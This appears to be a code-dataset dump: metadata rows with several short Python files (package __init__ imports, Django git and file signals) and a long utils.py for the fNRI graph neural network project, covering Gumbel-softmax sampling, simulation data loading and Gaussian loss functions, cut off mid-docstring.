| 48.105208 | 108 | 0.615275 | 5,090 | 46,181 | 5.255206 | 0.068959 | 0.023627 | 0.03645 | 0.023926 | 0.877902 | 0.858312 | 0.829751 | 0.812853 | 0.788403 | 0.775207 | 0 | 0.023704 | 0.280137 | 46,181 | 959 | 109 | 48.15537 | 0.780923 | 0.067474 | 0 | 0.667939 | 0 | 0 | 0.164189 | 0.069486 | 0 | 0 | 0 | 0 | 0.115776 | 1 | 0.05598 | false | 0.001272 | 0.015267 | 0 | 0.076336 | 0.002545 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
e6ee538e7dbc78b6955bfb070afda32b5d9fe25c | 37 | py | Python | ipmi/__init__.py | davidc0le/ipmitool | 830081623c0ec75d560123a559f0bb201f26cde6 | [
"Apache-2.0"
] | null | null | null | ipmi/__init__.py | davidc0le/ipmitool | 830081623c0ec75d560123a559f0bb201f26cde6 | [
"Apache-2.0"
] | null | null | null | ipmi/__init__.py | davidc0le/ipmitool | 830081623c0ec75d560123a559f0bb201f26cde6 | [
"Apache-2.0"
] | null | null | null | from ipmi import ipmitool, IPMIError
| 18.5 | 36 | 0.837838 | 5 | 37 | 6.2 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.135135 | 37 | 1 | 37 | 37 | 0.96875 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
fc37dc26211c884968c689db09cb24a9bead1a8e | 577 | py | Python | data/test/python/fc37dc26211c884968c689db09cb24a9bead1a8esignals.py | harshp8l/deep-learning-lang-detection | 2a54293181c1c2b1a2b840ddee4d4d80177efb33 | [
"MIT"
] | 84 | 2017-10-25T15:49:21.000Z | 2021-11-28T21:25:54.000Z | data/test/python/fc37dc26211c884968c689db09cb24a9bead1a8esignals.py | vassalos/deep-learning-lang-detection | cbb00b3e81bed3a64553f9c6aa6138b2511e544e | [
"MIT"
] | 5 | 2018-03-29T11:50:46.000Z | 2021-04-26T13:33:18.000Z | data/test/python/fc37dc26211c884968c689db09cb24a9bead1a8esignals.py | vassalos/deep-learning-lang-detection | cbb00b3e81bed3a64553f9c6aa6138b2511e544e | [
"MIT"
] | 24 | 2017-11-22T08:31:00.000Z | 2022-03-27T01:22:31.000Z | import django.dispatch
# files
file_edit_start = django.dispatch.Signal(providing_args=["repo", "file_path", "url"])
file_edit_finish = django.dispatch.Signal(providing_args=["repo", "file_path", "url"])
file_created = django.dispatch.Signal(providing_args=["repo", "file_path", "url"])
file_removed = django.dispatch.Signal(providing_args=["repo", "file_path", "url"])
# git
commit = django.dispatch.Signal(providing_args=["repo", "message"])
push = django.dispatch.Signal(providing_args=["repo", "message"])
pull = django.dispatch.Signal(providing_args=["repo", "message"]) | 48.083333 | 86 | 0.7487 | 75 | 577 | 5.533333 | 0.28 | 0.26988 | 0.337349 | 0.489157 | 0.809639 | 0.809639 | 0.809639 | 0.491566 | 0.491566 | 0.375904 | 0 | 0 | 0.067591 | 577 | 12 | 87 | 48.083333 | 0.771375 | 0.015598 | 0 | 0 | 0 | 0 | 0.171378 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.125 | 0 | 0.125 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
fc3f5b758508e4ea62d4b3be03a2c65a5bccf93f | 26 | py | Python | app/images/__init__.py | michaelscales88/flask_photo | bf3d2622cadd010dc8eb522610a5130bf4b9be98 | [
"MIT"
] | null | null | null | app/images/__init__.py | michaelscales88/flask_photo | bf3d2622cadd010dc8eb522610a5130bf4b9be98 | [
"MIT"
] | null | null | null | app/images/__init__.py | michaelscales88/flask_photo | bf3d2622cadd010dc8eb522610a5130bf4b9be98 | [
"MIT"
] | null | null | null | from .models import Image
| 13 | 25 | 0.807692 | 4 | 26 | 5.25 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.153846 | 26 | 1 | 26 | 26 | 0.954545 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
fca25c1e191510522ef4a849fda1f77b34f7fa8d | 80 | py | Python | few_shot_learning/data/__init__.py | summelon/NASA_Hackathon2020_Team10 | a7d3c3b3a1c1c217090111cfdf2174c755e95780 | [
"MIT"
] | 3 | 2020-10-04T09:00:01.000Z | 2021-07-06T02:36:55.000Z | few_shot_learning/data/__init__.py | adkevin3307/NASA_Hackathon2020_Team10 | a7d3c3b3a1c1c217090111cfdf2174c755e95780 | [
"MIT"
] | null | null | null | few_shot_learning/data/__init__.py | adkevin3307/NASA_Hackathon2020_Team10 | a7d3c3b3a1c1c217090111cfdf2174c755e95780 | [
"MIT"
] | 1 | 2020-10-05T15:06:30.000Z | 2020-10-05T15:06:30.000Z | from . import datamgr
from . import dataset
from . import additional_transforms
| 20 | 35 | 0.8125 | 10 | 80 | 6.4 | 0.6 | 0.46875 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.15 | 80 | 3 | 36 | 26.666667 | 0.941176 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
5d76c0776d99db82da2575e147b348a3fa19c458 | 24 | py | Python | contrib/diggext/drivers/devices/appliance/__init__.py | thekad/clusto | c141ea3ef4931c6a21fdf42845c6e9de5ee08caa | [
"BSD-3-Clause"
] | 216 | 2015-01-10T17:03:25.000Z | 2022-03-24T07:23:41.000Z | contrib/diggext/drivers/devices/appliance/__init__.py | thekad/clusto | c141ea3ef4931c6a21fdf42845c6e9de5ee08caa | [
"BSD-3-Clause"
] | 23 | 2015-01-08T16:51:22.000Z | 2021-03-13T12:56:04.000Z | contrib/diggext/drivers/devices/appliance/__init__.py | thekad/clusto | c141ea3ef4931c6a21fdf42845c6e9de5ee08caa | [
"BSD-3-Clause"
] | 49 | 2015-01-08T00:13:17.000Z | 2021-09-22T02:01:20.000Z | from netscaler import *
| 12 | 23 | 0.791667 | 3 | 24 | 6.333333 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.166667 | 24 | 1 | 24 | 24 | 0.95 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
5dabf911a62060d60b0502816b1afce50085893a | 121 | py | Python | bcpy/processing/__init__.py | bneurd/bcpy | f52b64d3206c38f3131e91b4067a35765991891e | [
"MIT"
] | 2 | 2019-05-08T17:35:55.000Z | 2020-03-06T18:23:40.000Z | bcpy/processing/__init__.py | igornfaustino/bcpy | f52b64d3206c38f3131e91b4067a35765991891e | [
"MIT"
] | 17 | 2019-07-17T01:36:15.000Z | 2020-05-02T13:22:27.000Z | bcpy/processing/__init__.py | bneurd/bcpy | f52b64d3206c38f3131e91b4067a35765991891e | [
"MIT"
] | 1 | 2019-05-08T17:38:35.000Z | 2019-05-08T17:38:35.000Z | from .processing import bandfilter, notch, drop_channels, car
__all__ = ['bandfilter', 'notch', 'drop_channels', 'car']
| 30.25 | 61 | 0.735537 | 14 | 121 | 5.928571 | 0.642857 | 0.361446 | 0.457831 | 0.650602 | 0.722892 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.115702 | 121 | 3 | 62 | 40.333333 | 0.775701 | 0 | 0 | 0 | 0 | 0 | 0.256198 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.5 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
5ded183750a547cb77eb404a5b38f2df70661cfa | 127,223 | py | Python | utils.py | vassilis-karavias/fNRI-mastersigma | d3f4fecf9d28a9bc6e6150994824ca7674006ed3 | [
"MIT"
] | null | null | null | utils.py | vassilis-karavias/fNRI-mastersigma | d3f4fecf9d28a9bc6e6150994824ca7674006ed3 | [
"MIT"
] | null | null | null | utils.py | vassilis-karavias/fNRI-mastersigma | d3f4fecf9d28a9bc6e6150994824ca7674006ed3 | [
"MIT"
] | null | null | null | """
This code is based on https://github.com/ekwebb/fNRI which in turn is based on https://github.com/ethanfetaya/NRI
(MIT licence)
"""
import numpy as np
import torch
from torch.utils.data.dataset import TensorDataset
from torch.utils.data import DataLoader
import torch.nn.functional as F
from torch.autograd import Variable
from itertools import permutations, chain
from math import factorial
import time
from os import path
def my_softmax(input, axis=1):
trans_input = input.transpose(axis, 0).contiguous()
soft_max_1d = F.softmax(trans_input, dim=0) # added dim=0 as implicit choice is deprecated, dim 0 is edgetype due to transpose
return soft_max_1d.transpose(axis, 0)
def binary_concrete(logits, tau=1, hard=False, eps=1e-10):
y_soft = binary_concrete_sample(logits, tau=tau, eps=eps)
if hard:
y_hard = (y_soft > 0.5).float()
y = Variable(y_hard.data - y_soft.data) + y_soft
else:
y = y_soft
return y
def binary_concrete_sample(logits, tau=1, eps=1e-10):
logistic_noise = sample_logistic(logits.size(), eps=eps)
if logits.is_cuda:
logistic_noise = logistic_noise.cuda()
y = logits + Variable(logistic_noise)
return F.sigmoid(y / tau)
def sample_logistic(shape, eps=1e-10):
uniform = torch.rand(shape).float()
return torch.log(uniform + eps) - torch.log(1 - uniform + eps)
def sample_gumbel(shape, eps=1e-10):
"""
NOTE: Stolen from https://github.com/pytorch/pytorch/pull/3341/commits/327fcfed4c44c62b208f750058d14d4dc1b9a9d3
Sample from Gumbel(0, 1)
based on
https://github.com/ericjang/gumbel-softmax/blob/3c8584924603869e90ca74ac20a6a03d99a91ef9/Categorical%20VAE.ipynb ,
(MIT license)
"""
U = torch.rand(shape).float()
return - torch.log(eps - torch.log(U + eps))
def gumbel_softmax_sample(logits, tau=1, eps=1e-10):
"""
NOTE: Stolen from https://github.com/pytorch/pytorch/pull/3341/commits/327fcfed4c44c62b208f750058d14d4dc1b9a9d3
Draw a sample from the Gumbel-Softmax distribution
based on
https://github.com/ericjang/gumbel-softmax/blob/3c8584924603869e90ca74ac20a6a03d99a91ef9/Categorical%20VAE.ipynb
(MIT license)
"""
gumbel_noise = sample_gumbel(logits.size(), eps=eps)
if logits.is_cuda:
gumbel_noise = gumbel_noise.cuda()
y = logits + Variable(gumbel_noise)
return my_softmax(y / tau, axis=-1)
def gumbel_softmax(logits, tau=1, hard=False, eps=1e-10):
"""
NOTE: Stolen from https://github.com/pytorch/pytorch/pull/3341/commits/327fcfed4c44c62b208f750058d14d4dc1b9a9d3
Sample from the Gumbel-Softmax distribution and optionally discretize.
Args:
logits: [batch_size, n_class] unnormalized log-probs
tau: non-negative scalar temperature
hard: if True, take argmax, but differentiate w.r.t. soft sample y
Returns:
[batch_size, n_class] sample from the Gumbel-Softmax distribution.
If hard=True, then the returned sample will be one-hot, otherwise it will
be a probability distribution that sums to 1 across classes
Constraints:
- this implementation only works on batch_size x num_features tensor for now
based on
https://github.com/ericjang/gumbel-softmax/blob/3c8584924603869e90ca74ac20a6a03d99a91ef9/Categorical%20VAE.ipynb ,
(MIT license)
"""
y_soft = gumbel_softmax_sample(logits, tau=tau, eps=eps)
if hard:
shape = logits.size()
_, k = y_soft.data.max(-1)
# this bit is based on
# https://discuss.pytorch.org/t/stop-gradients-for-st-gumbel-softmax/530/5
y_hard = torch.zeros(*shape)
if y_soft.is_cuda:
y_hard = y_hard.cuda()
y_hard = y_hard.zero_().scatter_(-1, k.view(shape[:-1] + (1,)), 1.0)
# this cool bit of code achieves two things:
# - makes the output value exactly one-hot (since we add then
# subtract y_soft value)
# - makes the gradient equal to y_soft gradient (since we strip
# all other gradients)
y = Variable(y_hard - y_soft.data) + y_soft
else:
y = y_soft
return y
def my_sigmoid(logits, hard=True, sharpness=1.0):
edges_soft = 1/(1+torch.exp(-sharpness*logits))
if hard:
edges_hard = torch.round(edges_soft)
# this bit is based on
# https://discuss.pytorch.org/t/stop-gradients-for-st-gumbel-softmax/530/5
if edges_soft.is_cuda:
edges_hard = edges_hard.cuda()
# this cool bit of code achieves two things:
# - makes the output value exactly one-hot (since we add then
# subtract y_soft value)
# - makes the gradient equal to y_soft gradient (since we strip
# all other gradients)
edges = Variable(edges_hard - edges_soft.data) + edges_soft
else:
edges = edges_soft
return edges
def binary_accuracy(output, labels):
preds = output > 0.5
correct = preds.type_as(labels).eq(labels).double()
correct = correct.sum()
return correct / len(labels)
def edge_type_encode(edges): # this is used to gives each 'interaction strength' a unique integer = 0, 1, 2 ..
unique = np.unique(edges)
encode = np.zeros(edges.shape)
for i in range(unique.shape[0]):
encode += np.where( edges == unique[i], i, 0)
return encode
def loader_edges_encode(edges, num_atoms):
edges = np.reshape(edges, [edges.shape[0], edges.shape[1], num_atoms ** 2])
edges = np.array(edge_type_encode(edges), dtype=np.int64)
off_diag_idx = np.ravel_multi_index(
np.where(np.ones((num_atoms, num_atoms)) - np.eye(num_atoms)),
[num_atoms, num_atoms])
edges = edges[:,:, off_diag_idx]
return edges
def loader_combine_edges(edges):
edge_types_list = [ int(np.max(edges[:,i,:]))+1 for i in range(edges.shape[1]) ]
assert( edge_types_list == sorted(edge_types_list)[::-1] )
encoded_target = np.zeros( edges[:,0,:].shape )
base = 1
for i in reversed(range(edges.shape[1])):
encoded_target += base*edges[:,i,:]
base *= edge_types_list[i]
return encoded_target.astype('int')
def load_data_NRI(batch_size=1, sim_folder='', shuffle=True, data_folder='data'):
# the edges numpy arrays below are [ num_sims, N, N ]
loc_train = np.load(path.join(data_folder,sim_folder,'loc_train.npy'))
vel_train = np.load(path.join(data_folder,sim_folder,'vel_train.npy'))
edges_train = np.load(path.join(data_folder,sim_folder,'edges_train.npy'))
loc_valid = np.load(path.join(data_folder,sim_folder,'loc_valid.npy'))
vel_valid = np.load(path.join(data_folder,sim_folder,'vel_valid.npy'))
edges_valid = np.load(path.join(data_folder,sim_folder,'edges_valid.npy'))
loc_test = np.load(path.join(data_folder,sim_folder,'loc_test.npy'))
vel_test = np.load(path.join(data_folder,sim_folder,'vel_test.npy'))
edges_test = np.load(path.join(data_folder,sim_folder,'edges_test.npy'))
# [num_samples, num_timesteps, num_dims, num_atoms]
num_atoms = loc_train.shape[3]
loc_max = loc_train.max()
loc_min = loc_train.min()
vel_max = vel_train.max()
vel_min = vel_train.min()
# Normalize to [-1, 1]
loc_train = (loc_train - loc_min) * 2 / (loc_max - loc_min) - 1
vel_train = (vel_train - vel_min) * 2 / (vel_max - vel_min) - 1
loc_valid = (loc_valid - loc_min) * 2 / (loc_max - loc_min) - 1
vel_valid = (vel_valid - vel_min) * 2 / (vel_max - vel_min) - 1
loc_test = (loc_test - loc_min) * 2 / (loc_max - loc_min) - 1
vel_test = (vel_test - vel_min) * 2 / (vel_max - vel_min) - 1
# Reshape to: [num_sims, num_atoms, num_timesteps, num_dims]
loc_train = np.transpose(loc_train, [0, 3, 1, 2])
vel_train = np.transpose(vel_train, [0, 3, 1, 2])
feat_train = np.concatenate([loc_train, vel_train], axis=3)
loc_valid = np.transpose(loc_valid, [0, 3, 1, 2])
vel_valid = np.transpose(vel_valid, [0, 3, 1, 2])
feat_valid = np.concatenate([loc_valid, vel_valid], axis=3)
loc_test = np.transpose(loc_test, [0, 3, 1, 2])
vel_test = np.transpose(vel_test, [0, 3, 1, 2])
feat_test = np.concatenate([loc_test, vel_test], axis=3)
edges_train = loader_edges_encode(edges_train, num_atoms)
edges_valid = loader_edges_encode(edges_valid, num_atoms)
edges_test = loader_edges_encode(edges_test, num_atoms)
edges_train = loader_combine_edges(edges_train)
edges_valid = loader_combine_edges(edges_valid)
edges_test = loader_combine_edges(edges_test)
feat_train = torch.FloatTensor(feat_train)
edges_train = torch.LongTensor(edges_train)
feat_valid = torch.FloatTensor(feat_valid)
edges_valid = torch.LongTensor(edges_valid)
feat_test = torch.FloatTensor(feat_test)
edges_test = torch.LongTensor(edges_test)
train_data = TensorDataset(feat_train, edges_train)
valid_data = TensorDataset(feat_valid, edges_valid)
test_data = TensorDataset(feat_test, edges_test)
train_data_loader = DataLoader(train_data, batch_size=batch_size, shuffle=shuffle)
valid_data_loader = DataLoader(valid_data, batch_size=batch_size)
test_data_loader = DataLoader(test_data, batch_size=batch_size)
return train_data_loader, valid_data_loader, test_data_loader, loc_max, loc_min, vel_max, vel_min
def load_data_fNRI(batch_size=1, sim_folder='', shuffle=True, data_folder='data'):
# the edges numpy arrays below are [ num_sims, N, N ]
loc_train = np.load(path.join(data_folder,sim_folder,'loc_train.npy'))
vel_train = np.load(path.join(data_folder,sim_folder,'vel_train.npy'))
edges_train = np.load(path.join(data_folder,sim_folder,'edges_train.npy'))
loc_valid = np.load(path.join(data_folder,sim_folder,'loc_valid.npy'))
vel_valid = np.load(path.join(data_folder,sim_folder,'vel_valid.npy'))
edges_valid = np.load(path.join(data_folder,sim_folder,'edges_valid.npy'))
loc_test = np.load(path.join(data_folder,sim_folder,'loc_test.npy'))
vel_test = np.load(path.join(data_folder,sim_folder,'vel_test.npy'))
edges_test = np.load(path.join(data_folder,sim_folder,'edges_test.npy'))
# [num_samples, num_timesteps, num_dims, num_atoms]
num_atoms = loc_train.shape[3]
loc_max = loc_train.max()
loc_min = loc_train.min()
vel_max = vel_train.max()
vel_min = vel_train.min()
# Normalize to [-1, 1]
loc_train = (loc_train - loc_min) * 2 / (loc_max - loc_min) - 1
vel_train = (vel_train - vel_min) * 2 / (vel_max - vel_min) - 1
loc_valid = (loc_valid - loc_min) * 2 / (loc_max - loc_min) - 1
vel_valid = (vel_valid - vel_min) * 2 / (vel_max - vel_min) - 1
loc_test = (loc_test - loc_min) * 2 / (loc_max - loc_min) - 1
vel_test = (vel_test - vel_min) * 2 / (vel_max - vel_min) - 1
# Reshape to: [num_sims, num_atoms, num_timesteps, num_dims]
loc_train = np.transpose(loc_train, [0, 3, 1, 2])
vel_train = np.transpose(vel_train, [0, 3, 1, 2])
feat_train = np.concatenate([loc_train, vel_train], axis=3)
loc_valid = np.transpose(loc_valid, [0, 3, 1, 2])
vel_valid = np.transpose(vel_valid, [0, 3, 1, 2])
feat_valid = np.concatenate([loc_valid, vel_valid], axis=3)
loc_test = np.transpose(loc_test, [0, 3, 1, 2])
vel_test = np.transpose(vel_test, [0, 3, 1, 2])
feat_test = np.concatenate([loc_test, vel_test], axis=3)
edges_train = loader_edges_encode( edges_train, num_atoms )
edges_valid = loader_edges_encode( edges_valid, num_atoms )
edges_test = loader_edges_encode( edges_test, num_atoms )
edges_train = torch.LongTensor(edges_train)
edges_valid = torch.LongTensor(edges_valid)
edges_test = torch.LongTensor(edges_test)
feat_train = torch.FloatTensor(feat_train)
feat_valid = torch.FloatTensor(feat_valid)
feat_test = torch.FloatTensor(feat_test)
train_data = TensorDataset(feat_train, edges_train)
valid_data = TensorDataset(feat_valid, edges_valid)
test_data = TensorDataset(feat_test, edges_test)
train_data_loader = DataLoader(train_data, batch_size=batch_size, shuffle=shuffle)
valid_data_loader = DataLoader(valid_data, batch_size=batch_size)
test_data_loader = DataLoader(test_data, batch_size=batch_size)
return train_data_loader, valid_data_loader, test_data_loader, loc_max, loc_min, vel_max, vel_min
def to_2d_idx(idx, num_cols):
idx = np.array(idx, dtype=np.int64)
y_idx = np.array(np.floor(idx / float(num_cols)), dtype=np.int64)
x_idx = idx % num_cols
return x_idx, y_idx
def encode_onehot(labels):
classes = set(labels)
classes_dict = {c: np.identity(len(classes))[i, :] for i, c in
enumerate(classes)}
labels_onehot = np.array(list(map(classes_dict.get, labels)),
dtype=np.int32)
return labels_onehot
def get_triu_indices(num_nodes):
"""Linear triu (upper triangular) indices."""
ones = torch.ones(num_nodes, num_nodes)
eye = torch.eye(num_nodes, num_nodes)
triu_indices = (ones.triu() - eye).nonzero().t()
triu_indices = triu_indices[0] * num_nodes + triu_indices[1]
return triu_indices
def get_tril_indices(num_nodes):
"""Linear tril (lower triangular) indices."""
ones = torch.ones(num_nodes, num_nodes)
eye = torch.eye(num_nodes, num_nodes)
tril_indices = (ones.tril() - eye).nonzero().t()
tril_indices = tril_indices[0] * num_nodes + tril_indices[1]
return tril_indices
def get_offdiag_indices(num_nodes):
"""Linear off-diagonal indices."""
ones = torch.ones(num_nodes, num_nodes)
eye = torch.eye(num_nodes, num_nodes)
offdiag_indices = (ones - eye).nonzero().t()
offdiag_indices = offdiag_indices[0] * num_nodes + offdiag_indices[1]
return offdiag_indices
def get_triu_offdiag_indices(num_nodes):
"""Linear triu (upper) indices w.r.t. vector of off-diagonal elements."""
triu_idx = torch.zeros(num_nodes * num_nodes)
triu_idx[get_triu_indices(num_nodes)] = 1.
triu_idx = triu_idx[get_offdiag_indices(num_nodes)]
return triu_idx.nonzero()
def get_tril_offdiag_indices(num_nodes):
"""Linear tril (lower) indices w.r.t. vector of off-diagonal elements."""
tril_idx = torch.zeros(num_nodes * num_nodes)
tril_idx[get_tril_indices(num_nodes)] = 1.
tril_idx = tril_idx[get_offdiag_indices(num_nodes)]
return tril_idx.nonzero()
def get_minimum_distance(data):
data = data[:, :, :, :2].transpose(1, 2)
data_norm = (data ** 2).sum(-1, keepdim=True)
dist = data_norm + \
data_norm.transpose(2, 3) - \
2 * torch.matmul(data, data.transpose(2, 3))
min_dist, _ = dist.min(1)
return min_dist.view(min_dist.size(0), -1)
def get_buckets(dist, num_buckets):
dist = dist.cpu().data.numpy()
min_dist = np.min(dist)
max_dist = np.max(dist)
bucket_size = (max_dist - min_dist) / num_buckets
thresholds = bucket_size * np.arange(num_buckets)
bucket_idx = []
for i in range(num_buckets):
if i < num_buckets - 1:
idx = np.where(np.all(np.vstack((dist > thresholds[i],
dist <= thresholds[i + 1])), 0))[0]
else:
idx = np.where(dist > thresholds[i])[0]
bucket_idx.append(idx)
return bucket_idx, thresholds
def get_correct_per_bucket(bucket_idx, pred, target):
pred = pred.cpu().numpy()[:, 0]
target = target.cpu().data.numpy()
correct_per_bucket = []
for i in range(len(bucket_idx)):
preds_bucket = pred[bucket_idx[i]]
target_bucket = target[bucket_idx[i]]
correct_bucket = np.sum(preds_bucket == target_bucket)
correct_per_bucket.append(correct_bucket)
return correct_per_bucket
def get_correct_per_bucket_(bucket_idx, pred, target):
pred = pred.cpu().numpy()
target = target.cpu().data.numpy()
correct_per_bucket = []
for i in range(len(bucket_idx)):
preds_bucket = pred[bucket_idx[i]]
target_bucket = target[bucket_idx[i]]
correct_bucket = np.sum(preds_bucket == target_bucket)
correct_per_bucket.append(correct_bucket)
return correct_per_bucket
def kl_categorical(preds, log_prior, num_atoms, eps=1e-16):
kl_div = preds * (torch.log(preds + eps) - log_prior)
return kl_div.sum() / (num_atoms * preds.size(0)) # normalisation here is (batch * num atoms)
def kl_categorical_uniform(preds, num_atoms, num_edge_types, add_const=False,
eps=1e-16):
kl_div = preds * torch.log(preds + eps)
if add_const:
const = np.log(num_edge_types)
kl_div += const
return kl_div.sum() / (num_atoms * preds.size(0))
def kl_categorical_uniform_var(preds, num_atoms, num_edge_types, add_const=False,
eps=1e-16):
kl_div = preds * torch.log(preds + eps)
if add_const:
const = np.log(num_edge_types)
kl_div += const
return (kl_div.sum(dim=1) / num_atoms).var()
def nll_gaussian(preds, target, variance, add_const=False):
"""
loss function for fixed variance (log Gaussian)
:param preds: prediction values from NN of size [batch, particles, timesteps, (x,y,v_x,v_y)]
:param target: target data of size [batch, particles, timesteps, (x,y,v_x,v_y)]
:param variance: fixed value for the variance of the Gaussian. Type float
:param add_const: True- adds the 1/2 ln(2*pi*variance) term
:return: value of the loss function normalised by (batch * number of atoms)
"""
neg_log_p = ((preds - target) ** 2 / (2 * variance))
if add_const:
const = 0.5 * np.log(2 * np.pi * variance)
neg_log_p += const
return neg_log_p.sum() / (target.size(0) * target.size(1)) # normalisation here is (batch * num atoms)
def nll_gaussian_var(preds, target, variance, add_const=False):
"""
returns the variance over the batch of the reconstruction loss
:param preds: prediction values from NN of size [batch, particles, timesteps, (x,y,v_x,v_y)]
:param target: target data of size [batch, particles, timesteps, (x,y,v_x,v_y)]
:param variance: fixed value for the variance of the Gaussian. Type float
:param add_const: True- adds the 1/2 ln(2*pi*variance) term
:return: variance of the loss function
"""
neg_log_p = ((preds - target) ** 2 / (2 * variance))
if add_const:
const = 0.5 * np.log(2 * np.pi * variance)
neg_log_p += const
return (neg_log_p.sum(dim=1)/target.size(1)).var()
#
def nll_gaussian_variablesigma(preds, target, sigma, epoch, temperature, total_epochs, add_const=True):
"""
Loss function for the case of variable sigma, with isotropic gaussian
:param preds: prediction values from NN of size [batch, particles, timesteps, (x,y,v_x,v_y)]
:param target: target data of size [batch, particles, timesteps, (x,y,v_x,v_y)]
:param sigma: tensor of sigma values size [batch, particles, timesteps, (x,y,v_x,v_y)]
:param epoch: value of the current epoch
:param temperature: temperature used for the softplus for the additional biasing
:param total_epochs: number of total epochs
:param add_const: True- adds the 1/2 ln(2*pi*variance) term
:return: value of the loss function normalised by (batch * number of atoms)
"""
variance = sigma ** 2
# ensures variance does not go to 0
if (torch.min(variance) < pow(10, -10)):
accuracy = np.full((variance.size(0), variance.size(1), variance.size(2), variance.size(3)),
pow(10, -10), dtype=np.float32)
accuracy = torch.from_numpy(accuracy)
if preds.is_cuda:
accuracy = accuracy.cuda()
variance = torch.max(variance, accuracy)
neg_log_p = ((preds - target) ** 2 / (2 * variance))
# additional terms to add if we want to test how biasing helps
# biasing with sigmoid envelope
#+ 0.1* (1-sigmoid(epoch, total_epochs/2, temperature)) * ((preds-target) ** 2 +variance)
# biasing without envelope
# + 0.1 * ((preds-target) ** 2 + variance)
loss_1 = neg_log_p
loss_2 = 0.0
if add_const:
const = (0.5 * torch.log(2*np.pi* variance))
neg_log_p = neg_log_p + const
loss_2 += const
return neg_log_p.sum() / (target.size(0) * target.size(1)), loss_1.sum() / (target.size(0) * target.size(1)) , loss_2.sum() / (target.size(0) * target.size(1)) # normalisation here is (batch * num atoms)
def nll_gaussian_var__variablesigma(preds, target, sigma, epoch, temperature, total_epochs, add_const=True):
"""
Loss function for the case of variable sigma, with isotropic gaussian
returns the variance over the batch of the reconstruction loss
:param preds: prediction values from NN of size [batch, particles, timesteps, (x,y,v_x,v_y)]
:param target: target data of size [batch, particles, timesteps, (x,y,v_x,v_y)]
:param sigma: tensor of sigma values size [batch, particles, timesteps, (x,y,v_x,v_y)]
:param epoch: value of the current epoch
:param temperature: temperature used for the softplus for the additional biasing
:param total_epochs: number of total epochs
:param add_const: True- adds the 1/2 ln(2*pi*variance) term
:return: variation of the loss function
"""
variance = sigma ** 2
# ensures variance does not go to 0
if (torch.min(variance) < pow(10, -10)):
accuracy = np.full((variance.size(0), variance.size(1), variance.size(2), variance.size(3)),
pow(10, -10), dtype=np.float32)
accuracy = torch.from_numpy(accuracy)
if preds.is_cuda:
accuracy = accuracy.cuda()
variance = torch.max(variance, accuracy)
neg_log_p = ((preds - target) ** 2 / (2 * variance))
# additional terms to add if we want to test how biasing helps
# + 0.1 * (1-sigmoid(epoch, total_epochs/2, temperature)) * ((preds-target) ** 2 +variance)
# np.exp(-epoch/temperature) *
#neg_log_p = ((preds - target) ** 2 / (2 * variance))- 0.0000001/ sigma
if add_const:
const = (0.5 * torch.log(2*np.pi* variance))
neg_log_p = neg_log_p + const
return (neg_log_p.sum(dim=1)/target.size(1)).var()
def nll_gaussian_variablesigma_semiisotropic(preds, target, sigma, epoch, temperature, total_epochs, add_const=True):
"""
Loss function for the case of variable sigma- semiisotropic => isotropic in (x,y) and (vx,vy)
returns the variance over the batch of the reconstruction loss
